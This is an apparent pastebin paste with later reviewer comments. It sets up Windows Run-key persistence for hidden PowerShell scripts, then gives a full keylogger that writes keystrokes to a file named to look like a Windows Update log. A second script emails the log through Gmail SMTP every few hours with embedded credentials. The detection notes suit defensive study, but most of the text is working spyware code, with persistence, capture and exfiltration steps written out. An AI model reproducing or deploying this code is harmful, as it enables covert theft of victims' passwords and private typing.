
Untitled

a guest Mar 14th, 2019 199 Never
  1. regedit
  2. Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  3. create registry key (string)
  4. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -file C:\keylogger.ps1
  5. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -file C:\smtp.ps1
  6.  
  7. <#
  8. PowerShell keystroke logger by shima
  9. http://vacmf.org/2013/01/23/powershell-keylogger/
  10. #>
  11.  
  12. $shell =  New-Object -ComObject "Shell.Application"
      # Minimizes every open desktop window through the Shell.Application COM
      # object; this runs once, before the KeyLog function is defined and called.
  13. $shell.minimizeall()
  14.  
  15. function KeyLog {
          # Keystroke capture loop. Declares four user32.dll P/Invoke wrappers with
          # Add-Type, then every 40 ms polls virtual-key codes 1..254 with
          # GetAsyncKeyState, translates each newly pressed key to text with
          # ToUnicode, and appends that text to "$env:temp\windowsupdate.log".
          # Takes no parameters and never returns (while ($true) with no break).
          #
          # NOTE(review), detection: with PowerShell script block logging
          # (event ID 4104) or AMSI in place, the DllImport signatures below are
          # recorded as plain text. GetAsyncKeyState together with ToUnicode inside
          # an Add-Type member definition is a useful hunting string for this
          # technique.
  16.    
  17.     # MapVirtualKeyMapTypes
  18.     # <summary>
  19.     # uCode is a virtual-key code and is translated into a scan code.
  20.     # If it is a virtual-key code that does not distinguish between left- and
  21.     # right-hand keys, the left-hand scan code is returned.
  22.     # If there is no translation, the function returns 0.
  23.     # </summary>
  24.     $MAPVK_VK_TO_VSC = 0x00
  25.    
  26.     # <summary>
  27.     # uCode is a scan code and is translated into a virtual-key code that
  28.     # does not distinguish between left- and right-hand keys. If there is no
  29.     # translation, the function returns 0.
  30.     # </summary>
  31.     $MAPVK_VSC_TO_VK = 0x01
  32.    
  33.     # <summary>
  34.     # uCode is a virtual-key code and is translated into an unshifted
  35.     # character value in the low-order word of the return value. Dead keys (diacritics)
  36.     # are indicated by setting the top bit of the return value. If there is no
  37.     # translation, the function returns 0.
  38.     # </summary>
  39.     $MAPVK_VK_TO_CHAR = 0x02
  40.    
  41.     # <summary>
  42.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  43.     # virtual-key code that distinguishes between left- and right-hand keys. If
  44.     # there is no translation, the function returns 0.
  45.     # </summary>
  46.     $MAPVK_VSC_TO_VK_EX = 0x03
  47.    
  48.     # <summary>
  49.     # Not currently documented
  50.     # </summary>
  51.     $MAPVK_VK_TO_VSC_EX = 0x04
  52.    
          # The four here-strings below hold C# extern declarations for user32.dll
          # functions; each one is handed to Add-Type further down.
  53.     $virtualkc_sig = @'
  54. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  55. public static extern short GetAsyncKeyState(int virtualKeyCode);
  56. '@
  57.  
  58.     $kbstate_sig = @'
  59. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  60. public static extern int GetKeyboardState(byte[] keystate);
  61. '@
  62.  
  63.     $mapchar_sig = @'
  64. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  65. public static extern int MapVirtualKey(uint uCode, int uMapType);
  66. '@
  67.  
  68.     $tounicode_sig = @'
  69. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  70. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  71. '@
  72.  
          # Add-Type compiles each signature into a type under the Win32Functions
          # namespace; -passThru returns the type so its static method can be called.
          # NOTE(review), detection: on Windows PowerShell this runtime compilation
          # normally shows up as csc.exe started by powershell.exe - confirm against
          # the process-creation telemetry of the monitored build.
  73.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  74.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  75.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  76.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  77.  
          # Polling loop: one pass over all key codes, then a 40 ms sleep, forever.
  78.     while ($true) {
  79.         Start-Sleep -Milliseconds 40
  80.         $gotit = ""
  81.        
  82.         for ($char = 1; $char -le 254; $char++) {
  83.             $vkey = $char
  84.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
  85.            
                  # -32767 is 0x8001 as a signed 16-bit value: the key is down now and
                  # was pressed since the previous GetAsyncKeyState call for that key.
  86.             if ($gotit -eq -32767) {
  87.            
                      # 160 / 161 are the left / right Shift virtual-key codes. These three
                      # values are read here but not referenced again in this function.
  88.                 $l_shift = $getKeyState::GetAsyncKeyState(160)
  89.                 $r_shift = $getKeyState::GetAsyncKeyState(161)
  90.                 $caps_lock = [console]::CapsLock
  91.                
                      # The MapVirtualKey result is passed to ToUnicode as its scan-code argument.
  92.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  93.                
                      # 256-byte buffer filled by GetKeyboardState; the call's return value
                      # is stored in $checkkbstate and not examined.
  94.                 $kbstate = New-Object Byte[] 256
  95.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  96.                
  97.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
  98.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  99.                
                      # A positive ToUnicode result means characters were written to $mychar;
                      # they are appended to the log file as UTF-16 (-Encoding Unicode).
                      # NOTE(review), detection: the file name resembles a Windows Update
                      # log, presumably to avoid notice. A steadily growing
                      # windowsupdate.log under a user's %TEMP%, written by powershell.exe,
                      # is worth a file-monitoring rule or hunt query.
  100.                 if ($unicode_res -gt 0) {
  101.                     $logfile = "$env:temp\windowsupdate.log"
  102.                     Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject $mychar.ToString()
  103.                 }
  104.             }
  105.         }
  106.     }
  107. }
  108.  
  109. KeyLog
       # Starts the capture loop defined above; KeyLog loops forever and does not return.
  110.  
  111.  
  112.  
  113.  
  114.  
  115. ##Developer : Suresh Kumar
  116.  
  117. ##Date   : 25 October 2018
  118.  
  119. ## Variables definition
  120.  
  121. while(1)
  122. {
           ## Mail-out loop with no exit condition. Each pass builds a MailMessage
           ## carrying one file attachment, sends it through smtp.gmail.com on port
           ## 587 with EnableSsl set and hard-coded credentials, then sleeps 26000
           ## seconds (about 7.2 hours) before repeating.
           ##
           ## NOTE(review), detection: powershell.exe connecting to a public mail
           ## provider on the SMTP submission port is unusual on most workstations.
           ## Egress filtering of outbound SMTP from user endpoints, plus network
           ## telemetry keyed on the originating process, covers this channel.
  123.  
  124.     $EmailFromAddress = "send0@gmail.com"
  125.  
  126.     $EmailToAddress = "recieved@gmail.com"      ## The mail id to which we need to send file
  127.  
  128.     $Subject = "Log File"
  129.  
  130.     $Body = “Download File.”
  131.  
  132.     $attachment = "key.log"   ## File Location
  133.  
  134.     $smtpserver = "smtp.gmail.com"
  135.  
  136.  
  137.  
  138.     ##Mail configuration
  139.  
  140.  
  141.  
  142.     $message = new-object System.Net.Mail.MailMessage
  143.  
  144.     $message.From = $EmailFromAddress
  145.  
  146.     $message.To.Add($EmailToAddress)
  147.  
  148.     $message.IsBodyHtml = $True
  149.  
  150.     $message.Subject = $Subject
  151.  
  152.     $attach = new-object Net.Mail.Attachment($attachment)
  153.  
  154.     $message.Attachments.Add($attach)
  155.  
  156.     $message.body = $Body
  157.  
           ## Client for the configured server on port 587; EnableSsl requests an
           ## encrypted session, so the message content is not readable on the wire.
  158.     $smtp = new-object Net.Mail.SmtpClient($smtpserver,587)
  159.  
  160.     $smtp.EnableSsl = $True
  161.  
           ## Account name and password are embedded in clear text (placeholder values
           ## in this paste). NOTE(review): in a recovered sample these strings are an
           ## indicator in their own right and also appear in script block logs.
  162.     $smtp.Credentials = New-Object System.Net.NetworkCredential('email@gmail.com','password');
  163.  
  164.     $smtp.Send($message)
  165.  
  166.     start-sleep -seconds 26000
  167.  
  168. }